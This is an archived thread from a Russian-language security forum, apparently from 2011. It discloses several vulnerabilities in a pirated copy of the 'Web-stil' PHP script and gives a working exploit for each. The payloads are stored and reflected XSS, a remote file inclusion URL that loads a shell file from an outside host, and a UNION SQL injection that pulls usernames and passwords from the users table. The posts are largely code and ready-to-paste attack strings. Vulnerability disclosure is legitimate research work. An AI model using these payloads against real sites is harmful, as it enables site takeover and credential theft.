RDot

RDot (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   Web-stil ("пиратская" копия) (https://rdot.org/forum/showthread.php?t=1202)

Online 05.02.2011 14:41

Web-stil ("пиратская" копия)
 
Web-stil ("пиратская копия")
Version: 1.0 (нет данных)

Active XSS

Vuln file: chat.php(messlist.php)
Файл chat.php через <iframe> загружает результат messlist.php, а messlist.php в свое время берет сообщения из БД (в БД сообщение добавляется без фильтрации):
PHP код:

//chat.php
<iframe frameborder="0" width="100%" height="400" src="messlist.php" marginheight="2" marginwidth="2" scrolling="auto" allowtransparency="yes" name="chatmesslist" style="border:#000000 1px solid;"></iframe>

// 

PHP код:

//messlist.php
$res=mysql_query("select * from tb_chat order by id desc limit 20");
// 

Exploit:
Код:

Просто через форму добавляем сообщения с содержанием "<script>alert('XsS')</script>" и имеем активку..[/COLOR]

Passive XSS

Vuln file: register.php
PHP код:

//
<td width="250" align="left"><input type="text" size="25" maxlength="25" name="referer" value="<? echo limpiar($_GET["r"]); ?>" autocomplete="off" class="field" value="" tabindex="1" /></td>

//

Exploit:
Код:

http://[host]/[path]/register.php?r="><script>alert(111)</script>
Примеры

~d0s~ 05.02.2011 18:46

RFI or LFI
Need:
allow_url_include = on
admin account

admin/adminmain.php
PHP код:

if(isset($_GET["p"]))
{
    
$p=$_GET["p"];
    
$p.='.php';
    include(
$p);


Код:

http://localhost/web-stil/admin/adminmain.php?p=http://pentagon.xek/myshell_at_pentagon.txt?
Скачать двиг можно тутэ: http://vo-bank.com/engine/download.php?id=25
p.s. указывайте ссылки на скачивание,приходится гуглеть.

Online 08.02.2011 14:14

SQL inj
if mq = off
Vuln file: inbox.php
PHP код:

///
    
if($action=='view')
    {
        require(
'config.php');
        
$res=mysql_query("select * from tb_mail where id='$id'");
        
$res=mysql_fetch_array($res);
        
mysql_query("update tb_mail set status='1' where id='$id'");
        
mysql_close($con);
        
?>

/// 

Exploit:
Код:

Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+"
В админке и почти во всех скриптах инъекции присутствуют =)


Часовой пояс GMT +3, время: 04:49.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot